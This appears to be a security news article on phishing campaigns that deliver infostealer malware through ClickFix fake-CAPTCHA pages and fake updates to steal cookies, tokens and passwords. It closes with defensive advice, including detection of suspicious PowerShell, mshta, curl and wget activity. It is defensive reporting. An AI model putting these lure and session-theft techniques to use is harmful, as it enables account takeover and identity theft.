Cybercriminals Move Beyond Fake Login Pages as Infostealer Malware Becomes a Go-To Phishing Payload

Cybercriminals are changing how they run phishing attacks. Instead of relying only on fake login pages that ask victims to type passwords, many campaigns now try to install infostealer malware that can quietly collect saved passwords, cookies, tokens, autofill data, crypto wallet details, and files from the victim’s device.

The shift makes phishing more dangerous because attackers no longer need a user to enter credentials on a fake website. A successful infection can give them a much wider set of identity data in one operation. Malwarebytes researchers said infostealers have become attractive because they reduce friction, scale well, and remain widely available in criminal markets.

Traditional phishing still matters, especially for business email compromise and account takeover. However, attackers increasingly want the browser session itself. A stolen session cookie or authentication token can help them enter accounts even when multi-factor authentication protects the password.

Why infostealers are replacing simple credential theft in some campaigns

A fake login page can steal a username and password, but it has limits. The victim has to trust the page, type the information, and sometimes complete MFA. Infostealer malware skips much of that process by collecting data already stored inside browsers, apps, and local files.

The stolen data can include work passwords, personal passwords, payment details, browser cookies, session tokens, screenshots, crypto wallet files, and cloud service credentials. SpyCloud’s 2026 Identity Exposure Report said the company recaptured 8.6 billion stolen cookies and session artifacts tied to malware infections, showing how valuable session hijacking has become.

This changes the economics of phishing. One infected device can generate many kinds of data that attackers can sell to different buyers. Account takeover crews, fraud groups, ransomware affiliates, and initial access brokers can all use the same stolen identity package.

Attack method	What it tries to steal	Main risk
Fake login page	Usernames and passwords	Account takeover if the victim enters credentials
Adversary-in-the-middle phishing	Credentials, MFA flow data, and session tokens	MFA bypass and live session takeover
Infostealer malware	Passwords, cookies, tokens, wallet data, files, and browser data	Large-scale identity theft from one infected device
ClickFix lure	Initial code execution through copied commands	Malware installation after the user runs a command
Fake update prompt	Device access through a malicious installer	Malware delivery disguised as a browser or software update

How phishing now delivers infostealers

Modern phishing does not always start with an email that links to a fake Microsoft, Google, or banking page. Attackers now use malicious ads, fake browser updates, fake CAPTCHA pages, cracked software downloads, game cheats, browser extensions, social media messages, and compromised websites to push malware.

In March, Malwarebytes documented a campaign that used compromised WordPress sites and fake CAPTCHA pages to deliver the Vidar infostealer to Windows users. The lure asked users to run a command, which eventually installed the malware.

The same tactic has also moved beyond Windows. Malwarebytes found a macOS infostealer called Infiniti Stealer that used a fake verification page to trick users into pasting a Terminal command. That campaign showed how ClickFix-style social engineering can target Mac users too.

ClickFix and fake updates are helping malware spread

ClickFix attacks work because they turn the victim into the execution step. A page claims there is a verification problem, browser issue, file access error, or security warning. It then tells the user to copy and paste a command into Windows Run, PowerShell, Terminal, or another system tool.

This technique can bypass some traditional expectations around phishing. There may be no attachment, no obvious exploit, and no fake login form. The attack succeeds because the user follows instructions from a convincing page.

Large-scale campaigns are now combining ClickFix with fake software updates. Silent Push researchers recently described DriveSurge, an initial access broker operation that compromises legitimate websites and routes visitors through infrastructure that can serve ClickFix prompts or FakeUpdates-style malware pages.

• Fake CAPTCHA pages ask users to prove they are human by running a command.
• Fake browser update pages offer a malicious installer instead of a real update.
• Malicious ads can send users to spoofed download pages for popular apps.
• Pirated software and cracked tools often bundle infostealers with the installer.
• Compromised trusted sites can redirect visitors without the site owner knowing.

Why session cookies make MFA bypass easier

Multi-factor authentication still helps, but attackers have adapted. They increasingly target session cookies and authentication tokens because these artifacts can prove that a user has already logged in. If criminals can replay or abuse those tokens, they may not need the password or the MFA code.

SpyCloud reported that modern phishing datasets increasingly include session cookies, authentication tokens, and MFA workflow data. That makes identity exposure harder to solve with password resets alone.

This is why an infostealer infection can become a business incident, not just a personal device problem. A home computer used for work email, cloud dashboards, admin tools, or developer platforms can expose enterprise credentials and browser sessions.

What attackers do with stolen infostealer logs

Infostealer logs rarely stay with the original attacker. Many operators collect the data, package it, and sell it on criminal markets. Buyers can search for company domains, cloud services, VPN credentials, crypto wallets, password manager traces, and browser cookies.

The Malwarebytes report explains why this model scales so well. Attackers can automate infections, harvest large volumes of identity data, and reuse that data across many types of fraud and intrusion workflows.

Drive-by campaigns also feed the same market. Silent Push said DriveSurge appears to operate as an initial access broker using a pay-per-install model, meaning infected systems can become leads for other criminals.

Stolen item	How criminals use it
Saved passwords	Log in to email, cloud, banking, social, and business accounts
Session cookies	Hijack logged-in sessions and bypass some MFA checks
Authentication tokens	Access SaaS platforms, developer tools, or cloud accounts
Crypto wallet data	Steal funds or identify high-value victims
Local files	Find invoices, identity documents, keys, and business records
Browser autofill data	Collect addresses, payment hints, and account recovery details

How users and companies can reduce the risk

The most important rule is simple: never paste a command from a website, email, chat message, or pop-up into Windows Run, PowerShell, Command Prompt, Terminal, or a browser console. Real verification checks do not require users to run hidden system commands.

Users should also avoid sponsored ads when downloading software. It is safer to type the official website address directly or use a trusted app store. Cracked software, game cheats, unofficial browser extensions, and pirated tools remain high-risk sources for infostealers.

Companies should treat infostealer exposure as an identity incident. Password resets help, but they may not be enough if attackers stole active sessions, OAuth tokens, API keys, or browser cookies. Security teams should revoke sessions, rotate sensitive tokens, review login history, and check for new inbox rules, OAuth grants, and unauthorized devices.

• Block known malware delivery domains and monitor newly registered domains.
• Use endpoint detection rules for suspicious PowerShell, mshta, curl, wget, and Terminal activity.
• Restrict browser password storage on managed devices where possible.
• Enable phishing-resistant MFA, such as passkeys or hardware security keys, for critical accounts.
• Revoke sessions after suspected infostealer infections, not just passwords.
• Monitor dark web and malware-log sources for exposed corporate credentials.
• Train employees to recognize ClickFix, fake CAPTCHA, and fake update prompts.

The phishing threat is becoming more device-focused

The move from fake login pages to infostealer payloads shows how phishing has become more device-focused. Attackers still use social engineering, but the goal often shifts from capturing one password to compromising the browser, the session, and the local identity footprint.

The Vidar campaign and the Infiniti Stealer campaign show the same broader pattern across Windows and macOS. Attackers want users to install or execute something that gives them access to everything the browser already knows.

For defenders, the lesson is clear. Phishing prevention can no longer focus only on spotting fake login pages. It must also cover malware delivery, session theft, browser data protection, command execution, and the fast-growing market for stolen identity logs.

FAQ